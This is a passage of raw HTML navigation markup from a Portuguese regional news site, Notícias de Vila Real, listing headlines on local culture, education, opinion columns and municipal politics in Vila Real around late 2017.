href="http://www.noticiasdevilareal.com/category/sociedade/tradicao/">Tradição</a></div></div><div id=td_uid_2_5a35df40a9d95 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/aautad-da-mil-euros-a-melhor-projeto-na-area-da-inclusao-social/" rel="bookmark" title="AAUTAD dá mil euros a melhor projeto na área da Inclusão Social"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/02/Sem-Título-696x463-218x150.png" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/02/Sem-Título-696x463-218x150.png 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/02/Sem-Título-696x463-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="AAUTAD dá mil euros a melhor projeto na área da Inclusão Social"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/sociedade/educacao/" class="td-post-category">Educação</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/aautad-da-mil-euros-a-melhor-projeto-na-area-da-inclusao-social/" rel="bookmark" title="AAUTAD dá mil euros a melhor projeto na área da Inclusão Social">AAUTAD dá mil euros a melhor projeto na área da Inclusão&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/utad-atribuiu-honoris-causa-ao-presidente-da-junta-da-galiza/" rel="bookmark" title="UTAD atribuiu Honoris Causa ao Presidente da Junta da Galiza"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/UTAD-atribuiu-Honoris-Causa-ao-Presidente-da-Junta-da-Galiza--218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/UTAD-atribuiu-Honoris-Causa-ao-Presidente-da-Junta-da-Galiza--218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/UTAD-atribuiu-Honoris-Causa-ao-Presidente-da-Junta-da-Galiza--100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="UTAD atribuiu Honoris Causa ao Presidente da Junta da Galiza"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/sociedade/educacao/" class="td-post-category">Educação</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/utad-atribuiu-honoris-causa-ao-presidente-da-junta-da-galiza/" rel="bookmark" title="UTAD atribuiu Honoris Causa ao Presidente da Junta da Galiza">UTAD atribuiu Honoris Causa ao Presidente da Junta da Galiza</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" rel="bookmark" title="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/territorio/regiao/" class="td-post-category">Região</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" rel="bookmark" title="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares">“Presépio Vivo” recriado por mais de 80 figurantes em Poiares</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/dgs-recomenda-vacina-contra-gripe-e-hidratacao-contra-o-frio/" rel="bookmark" title="DGS recomenda vacina contra gripe e hidratação contra o frio"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/01/563290-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/01/563290-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/01/563290-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="DGS recomenda vacina contra gripe e hidratação contra o frio"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/sociedade/" class="td-post-category">Sociedade</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/dgs-recomenda-vacina-contra-gripe-e-hidratacao-contra-o-frio/" rel="bookmark" title="DGS recomenda vacina contra gripe e hidratação contra o frio">DGS recomenda vacina contra gripe e hidratação contra o frio</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_2_5a35df40a9d95" data-td_block_id="td_uid_2_5a35df40a9d95"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_2_5a35df40a9d95" data-td_block_id="td_uid_2_5a35df40a9d95"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor td-menu-item td-mega-menu menu-item-184"><a href="http://www.noticiasdevilareal.com/category/territorio/">Território</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_11_5a35df40ca5a0_rand td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_11_5a35df40ca5a0" ><script>var block_td_uid_11_5a35df40ca5a0 = new tdBlock();
block_td_uid_11_5a35df40ca5a0.id = "td_uid_11_5a35df40ca5a0";
block_td_uid_11_5a35df40ca5a0.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"16","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_11_5a35df40ca5a0_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_11_5a35df40ca5a0_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_11_5a35df40ca5a0.td_column_number = "3";
block_td_uid_11_5a35df40ca5a0.block_type = "td_block_mega_menu";
block_td_uid_11_5a35df40ca5a0.post_count = "4";
block_td_uid_11_5a35df40ca5a0.found_posts = "402";
block_td_uid_11_5a35df40ca5a0.header_color = "";
block_td_uid_11_5a35df40ca5a0.ajax_pagination_infinite_stop = "";
block_td_uid_11_5a35df40ca5a0.max_num_pages = "101";
tdBlocksArray.push(block_td_uid_11_5a35df40ca5a0);
</script>            <script>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</script>
            <div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_11_5a35df40ca5a0" id="td_uid_12_5a35df40cb227" data-td_block_id="td_uid_11_5a35df40ca5a0" data-td_filter_value="" href="http://www.noticiasdevilareal.com/category/territorio/">Todos</a><a class="mega-menu-sub-cat-td_uid_11_5a35df40ca5a0"  id="td_uid_13_5a35df40cb315" data-td_block_id="td_uid_11_5a35df40ca5a0" data-td_filter_value="13" href="http://www.noticiasdevilareal.com/category/territorio/fregueisas/">Freguesias</a><a class="mega-menu-sub-cat-td_uid_11_5a35df40ca5a0"  id="td_uid_14_5a35df40cb456" data-td_block_id="td_uid_11_5a35df40ca5a0" data-td_filter_value="14" href="http://www.noticiasdevilareal.com/category/territorio/regiao/">Região</a><a class="mega-menu-sub-cat-td_uid_11_5a35df40ca5a0"  id="td_uid_15_5a35df40cb590" data-td_block_id="td_uid_11_5a35df40ca5a0" data-td_filter_value="15" href="http://www.noticiasdevilareal.com/category/territorio/vila-real/">Vila Real</a></div></div><div id=td_uid_11_5a35df40ca5a0 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" rel="bookmark" title="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/territorio/regiao/" class="td-post-category">Região</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" rel="bookmark" title="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares">“Presépio Vivo” recriado por mais de 80 figurantes em Poiares</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/animacao-natalicia-em-vila-real/" rel="bookmark" title="Animação Natalícia em Vila Real"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/g-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/g-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/g-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Animação Natalícia em Vila Real"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/territorio/vila-real/" class="td-post-category">Vila Real</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/animacao-natalicia-em-vila-real/" rel="bookmark" title="Animação Natalícia em Vila Real">Animação Natalícia em Vila Real</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/chi-pardelinha-na-exposicao-erotismo-no-douro-palacio-de-mateus-1o-de-dezembro/" rel="bookmark" title="CHI PARDELINHA NA EXPOSIÇÃO EROTISMO NO DOURO &#8211; PALÁCIO DE MATEUS &#8211; 1º DE DEZEMBRO"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Chi-pardelinha-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Chi-pardelinha-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/11/Chi-pardelinha-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="CHI PARDELINHA NA EXPOSIÇÃO EROTISMO NO DOURO &#8211; PALÁCIO DE MATEUS &#8211; 1º DE DEZEMBRO"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/sociedade/cultura/" class="td-post-category">Cultura</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/chi-pardelinha-na-exposicao-erotismo-no-douro-palacio-de-mateus-1o-de-dezembro/" rel="bookmark" title="CHI PARDELINHA NA EXPOSIÇÃO EROTISMO NO DOURO &#8211; PALÁCIO DE MATEUS &#8211; 1º DE DEZEMBRO">CHI PARDELINHA NA EXPOSIÇÃO EROTISMO NO DOURO &#8211; PALÁCIO DE MATEUS&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/atividade-fisica-nas-freguesias-para-maiores-de-55-anos/" rel="bookmark" title="Atividade física nas freguesias para maiores de 55 anos"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/10/bila-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/10/bila-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/10/bila-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Atividade física nas freguesias para maiores de 55 anos"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/territorio/fregueisas/" class="td-post-category">Freguesias</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/atividade-fisica-nas-freguesias-para-maiores-de-55-anos/" rel="bookmark" title="Atividade física nas freguesias para maiores de 55 anos">Atividade física nas freguesias para maiores de 55 anos</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_11_5a35df40ca5a0" data-td_block_id="td_uid_11_5a35df40ca5a0"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_11_5a35df40ca5a0" data-td_block_id="td_uid_11_5a35df40ca5a0"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-218"><a href="http://www.noticiasdevilareal.com/category/opiniao/">Opinião</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_16_5a35df40db008_rand td-no-subcats td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_16_5a35df40db008" ><script>var block_td_uid_16_5a35df40db008 = new tdBlock();
block_td_uid_16_5a35df40db008.id = "td_uid_16_5a35df40db008";
block_td_uid_16_5a35df40db008.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"2","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_16_5a35df40db008_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_16_5a35df40db008_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_16_5a35df40db008.td_column_number = "3";
block_td_uid_16_5a35df40db008.block_type = "td_block_mega_menu";
block_td_uid_16_5a35df40db008.post_count = "5";
block_td_uid_16_5a35df40db008.found_posts = "117";
block_td_uid_16_5a35df40db008.header_color = "";
block_td_uid_16_5a35df40db008.ajax_pagination_infinite_stop = "";
block_td_uid_16_5a35df40db008.max_num_pages = "24";
tdBlocksArray.push(block_td_uid_16_5a35df40db008);
</script><div id=td_uid_16_5a35df40db008 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/passos-perdidos-uma-europa-de-catalunhas/" rel="bookmark" title="Passos Perdidos | Uma Europa de Catalunhas?"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/11/João-Álvaro-696x903-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/11/João-Álvaro-696x903-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/11/João-Álvaro-696x903-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Passos Perdidos | Uma Europa de Catalunhas?"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/opiniao/" class="td-post-category">Opinião</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/passos-perdidos-uma-europa-de-catalunhas/" rel="bookmark" title="Passos Perdidos | Uma Europa de Catalunhas?">Passos Perdidos | Uma Europa de Catalunhas?</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/perolas-e-diamantes-a-insatisfacao-e-o-disparate/" rel="bookmark" title="Pérolas e diamantes | A insatisfação e o disparate"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/Madureira-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/Madureira-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/Madureira-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Pérolas e diamantes | A insatisfação e o disparate"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/opiniao/" class="td-post-category">Opinião</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/perolas-e-diamantes-a-insatisfacao-e-o-disparate/" rel="bookmark" title="Pérolas e diamantes | A insatisfação e o disparate">Pérolas e diamantes | A insatisfação e o disparate</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/da-outra-margem-movimento-pelo-interior-em-nome-da-coesao/" rel="bookmark" title="Da outra margem | Movimento pelo Interior: Em nome da Coesão"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/reitor-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/reitor-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/reitor-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Da outra margem | Movimento pelo Interior: Em nome da Coesão"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/opiniao/" class="td-post-category">Opinião</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/da-outra-margem-movimento-pelo-interior-em-nome-da-coesao/" rel="bookmark" title="Da outra margem | Movimento pelo Interior: Em nome da Coesão">Da outra margem | Movimento pelo Interior: Em nome da Coesão</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/periscopio-a-moda-das-calcas-rotas/" rel="bookmark" title="Periscópio | A moda das calças rotas"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/diretor-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/diretor-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/diretor-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Periscópio | A moda das calças rotas"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/opiniao/" class="td-post-category">Opinião</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/periscopio-a-moda-das-calcas-rotas/" rel="bookmark" title="Periscópio | A moda das calças rotas">Periscópio | A moda das calças rotas</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/a-geringonca-e-as-autarquicas/" rel="bookmark" title="A Geringonça e as Autárquicas"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/11/João-Álvaro-696x903-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/11/João-Álvaro-696x903-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/11/João-Álvaro-696x903-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="A Geringonça e as Autárquicas"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/opiniao/" class="td-post-category">Opinião</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/a-geringonca-e-as-autarquicas/" rel="bookmark" title="A Geringonça e as Autárquicas">A Geringonça e as Autárquicas</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_16_5a35df40db008" data-td_block_id="td_uid_16_5a35df40db008"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_16_5a35df40db008" data-td_block_id="td_uid_16_5a35df40db008"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-219"><a href="http://www.noticiasdevilareal.com/category/politica/">Política</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_17_5a35df40df670_rand td-no-subcats td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_17_5a35df40df670" ><script>var block_td_uid_17_5a35df40df670 = new tdBlock();
block_td_uid_17_5a35df40df670.id = "td_uid_17_5a35df40df670";
block_td_uid_17_5a35df40df670.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"11","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_17_5a35df40df670_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_17_5a35df40df670_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_17_5a35df40df670.td_column_number = "3";
block_td_uid_17_5a35df40df670.block_type = "td_block_mega_menu";
block_td_uid_17_5a35df40df670.post_count = "5";
block_td_uid_17_5a35df40df670.found_posts = "74";
block_td_uid_17_5a35df40df670.header_color = "";
block_td_uid_17_5a35df40df670.ajax_pagination_infinite_stop = "";
block_td_uid_17_5a35df40df670.max_num_pages = "15";
tdBlocksArray.push(block_td_uid_17_5a35df40df670);
</script><div id=td_uid_17_5a35df40df670 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/psd-considera-injustificavel-aumento-de-quatro-para-seis-vereadores-a-tempo-inteiro/" rel="bookmark" title="PSD considera “injustificável” aumento de 4 para 6 vereadores a tempo inteiro"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/09/vila-real-town-hall-2-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/09/vila-real-town-hall-2-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/09/vila-real-town-hall-2-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="PSD considera “injustificável” aumento de 4 para 6 vereadores a tempo inteiro"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/politica/" class="td-post-category">Política</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/psd-considera-injustificavel-aumento-de-quatro-para-seis-vereadores-a-tempo-inteiro/" rel="bookmark" title="PSD considera “injustificável” aumento de 4 para 6 vereadores a tempo inteiro">PSD considera “injustificável” aumento de 4 para 6 vereadores a tempo&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/rui-rio-em-vila-real/" rel="bookmark" title="RUI RIO EM VILA REAL"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/rui_rio_vr1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/rui_rio_vr1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/rui_rio_vr1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="RUI RIO EM VILA REAL"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/politica/" class="td-post-category">Política</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/rui-rio-em-vila-real/" rel="bookmark" title="RUI RIO EM VILA REAL">RUI RIO EM VILA REAL</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/vila-real-tomada-de-posse-dos-orgaos-autarquicosamara-municipal/" rel="bookmark" title="VILA REAL &#8211; TOMADA DE POSSE DOS ÓRGÃOS AUTÁRQUICOS"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/IMG_2720-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/IMG_2720-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/10/IMG_2720-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="VILA REAL &#8211; TOMADA DE POSSE DOS ÓRGÃOS AUTÁRQUICOS"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/politica/" class="td-post-category">Política</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/vila-real-tomada-de-posse-dos-orgaos-autarquicosamara-municipal/" rel="bookmark" title="VILA REAL &#8211; TOMADA DE POSSE DOS ÓRGÃOS AUTÁRQUICOS">VILA REAL &#8211; TOMADA DE POSSE DOS ÓRGÃOS AUTÁRQUICOS</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/rui-santos-toma-posse-a-15-de-outubro/" rel="bookmark" title="Rui Santos toma posse a 15 de outubro"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/rui-santos-1-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/rui-santos-1-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/rui-santos-1-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Rui Santos toma posse a 15 de outubro"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/politica/" class="td-post-category">Política</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/rui-santos-toma-posse-a-15-de-outubro/" rel="bookmark" title="Rui Santos toma posse a 15 de outubro">Rui Santos toma posse a 15 de outubro</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/comicio-festa-do-psd-vila-real/" rel="bookmark" title="COMÍCIO FESTA DO PSD-VILA REAL"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/09/IMG_2604-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/09/IMG_2604-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/09/IMG_2604-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="COMÍCIO FESTA DO PSD-VILA REAL"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/politica/" class="td-post-category">Política</a>            </div>

